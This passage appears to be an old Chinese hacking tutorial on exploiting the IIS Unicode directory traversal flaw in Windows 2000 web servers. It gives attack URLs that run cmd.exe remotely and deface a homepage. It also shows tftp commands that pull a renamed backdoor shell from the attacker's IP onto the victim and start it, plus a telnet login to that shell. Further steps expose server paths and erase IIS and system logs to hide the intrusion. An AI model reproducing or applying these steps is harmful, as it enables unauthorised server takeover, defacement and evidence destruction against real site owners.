事情就那么简单,任何一个普通人都可以通过地址栏对存在该漏洞的目标主机做最简单的入侵。
当然,如果为了方便输入,我们可以把cmd.exe改名为其他名字的文件,比如说cnhack.exe
http://x.x.x.x/scripts/..%c0%af../w...ipts\cnhack.exe
以后使用就可以直接用:
http://x.x.x.x/scripts/cnhack.exe?/c+echo+黑客力量+> c:\inetpub\wwwroot\default.htm
上传文件:
上传文件的方法有很多种,但最好用的算是 tftp 啦。
什么是 tftp ?
简单来说,tftp 就是让你的电脑变成一台服务器,让攻击主机来下载你的文件。
这样就可以达到上传的目的。
首先,请大家打开“tftp.zip”压缩包。
解压后,运行 tftpd32.exe 。
在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。
然后,把你要上传的文件,复制到同一目录下。
回到你的浏览器,在地址栏里填入:
http://x.x.x.x/scripts/..%c0%af../w...cmd.exe?/c+tftp -i y.y.y.y GET cnhack.exe c:\\inetpub\\scripts\\ak.exe
y.y.y.y为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,
要看主机的具体情况而定,ak.exe为被改名的cnhack.exe(自己选名字吧)。
然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时cnhack.exe已经上传到主机c:\inetpub\scripts\目录了。
您可以自己检查一下。
执行cnhack.exe(ak.exe):
http://x.x.x.x/scripts/..%c0%af../w...\scripts\sr.exe
我们利用Uincode漏洞,进行“实战”。
本次范例需要的系统及程序情况如下:
操作系统:Windows98
对方操作系统:Windows 2000
程序(一):RangeScan扫描器 v0.7
程序(一): WinShell v1.0
程序(三):tftpd32 汉化版
程序(四):CleanIISLog
本机IP:127.0.0.1
测试IP:127.0.0.11
新程序说明:
RangeScan扫描器 v0.6:“isno”的作品。用于扫描一定范围的网段内存在特定CGI程序的主机。
WinShell v1.0:“孤独剑客”的作品。在主机上运行后可以得到一个shell。
tftpd32 汉化版:外国程序员“Ph.jounin”制作的一个tftp程序。简单易用。
CleanIISLog:“小榕”写的一个日志清除程序。
首先,我们应该扫描存在Unicode漏洞的主机。
打开“RangeScan扫描器”:
“RangeScan扫描器”使用方法:
(1)在“扫描IP地址范围”内填入要扫描的地址范围。
(2)在“扫描内容”内填入要扫描的CGI名称:“/scripts/..%c0%af../winnt/system32/cmd.exe”。
(3)点击“添加”按钮,将其添加到下面的内容列表里。
(4)点击“扫描”,开始扫描。
过了一会儿……
扫到了一个主机 IP:127.0.0.11
得到主机后,首先检验一下:
http://127.0.0.11/scripts/..%c0%af..../cmd.exe?/c+dir
通常我第一件事就是上传一个shell或者一个木马。这样就容易办事了:)
我这里利用WinShell。
WinShell 功能如下:
[简要说明]
WinShell是一个运行在Windows上的Telnet服务器小程序,它体积小小,却功能不凡!
功能简列如下:
1、支持Windows 9x/me/nt/2000/...
2、支持所有标准Telnet客户端软件。
3、多线程设计支持无限用户同时登录。
4、支持自定义监听端口,默认是5277 。
5、支持后台运行,就是运行后无影无踪。
6、不需要安装,只一个exe文件,绿色环保。
7、支持远程终止服务器程序。
[举例说明]
1、后台监听23端口
C:\>winshell 23
2、前台监听23端口
C:\>winshell 23@
3、从23端口登录winshell
C:\>telnet xxx.xxx.xxx.xxx 23
4、登录或远程终止winshell
按照3登录成功后会看到如下信息:
WinShell v1.0 - '!' to quit, 'enter' to shell...
这时候按“!”键即可终止winshell,按“回车”键即进入远程命令行状态,如下:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WinShell>
[特别说明]
该程序目前在win9x和me上只能支持一个用户登录,待后续版本改进!
程序目前都限制不能在中文Windows NT/2000上执行!
解压缩 winshell.zip 后,我们把 winshell.exe 放到 tftp 的同一目录下。
然后,我们在地址栏(浏览器)里输入:
http://127.0.0.11/scripts/..%c0%af....cmd.exe?/c+tftp -i y.y.y.y GET winshell.exe c:\\inetpub\\scripts\\windows.exe
* 注意: y.y.y.y 为你的IP。(当你打开 tftpd32.exe 的时候,它会自动显示你的 IP)
“c:\\inetpub\\scripts\\”为入侵主机目录。(这里是“\\”,而不是“\”
“windows.exe”为上传后,winshell的文件名。(“windows”这个名字不容易被发现!)
然后,我们在地址栏(浏览器)里输入:
http://127.0.0.11/scripts/..%c0%af....pts\windows.exe
* 注意:这时候,通常浏览器迟迟都没有出结果。事实上,它已经启动了!请暂时不要关闭这个浏览器。
接着,我们就可以在 DOS 里:telnet 127.0.0.11 5277 (* 注意:5277为默认端口)
在这里给大家一个小技巧:
通常在 windows 2000 里“命令提示符”(cmd.exe)或 windows 98 的 telnet.exe 是不开回显的。
如果不打开回显,可能在 telnet 的时候,会看不到自己输入的命令。
打开方法如下:
Windows2000打开和关闭回显方法:
1、--进入Telnet状态,按CTRL+],相当于ESC键
2、--输入set local_echo即可打开回显
3、--输入unset local_echo即可关闭回显
Win98下打开和关闭回显方法:
1、--打开Telnet窗口:在“开始”“运行”中输入“telnet”
2、--选取菜单栏的“终端”项,先择“首选”功能。
3、--出现一个“终端首选设置”,选取“终端选项”的“本地响应”即可打开。反之关闭。
当出现:
WinShell v1.0 - '!' to quit, 'enter' to shell...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>
成功了!现在,就像在DOS环境下一样!
* 告诉你一个小技巧:
当你不知道主页文件放在主机的哪个位置的时候,我们可以在地址栏里输入一个不存在的 .ida 文件。它就会显示出物理路径!
例如:
http://127.0.0.11/cnhack.ida
接着,我们就可以看到:
The IDQ file C:\Inetpub\wwwroot\cnhack.ida could not be found.
其中,“C:\Inetpub\wwwroot\”就是那台主机存放主页的地方:)
当然,你也可以上传一个木马。这样来得更加方便!而且权限也比较高。
接着,我们使用CleanIISLog清除日志。
使用说明:
CleanIISLog是一个清除IIS LOG记录的工具,和其他工具相比有以下不同点:
1、可以清除指定的的IP连接记录,保留其他IP记录。
2、当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。
用法: CleanIISLog <LogFile>|<.> <CleanIP>|<.>
<LogFile>: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件
(注意:处理所有日志文件需要很长的时间)。
<CleanIP>: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不
推荐这样做)。
CleanIISLog只能在本地运行,而且必须具有Administrators权限。
也可以手动清除日志:
http://127.0.0.11/scripts/..%c0%af....32\logfiles\*.*
http://127.0.0.11/scripts/..%c0%af....em32\dtclog\*.*
http://127.0.0.11/scripts/..%c0%af....32\config\*.evt
http://127.0.0.11/scripts/..%c0%af....\system32\*.log
http://127.0.0.11/scripts/..%c0%af....\system32\*.txt
http://127.0.0.11/scripts/..%c0%af....+c:\winnt\*.log
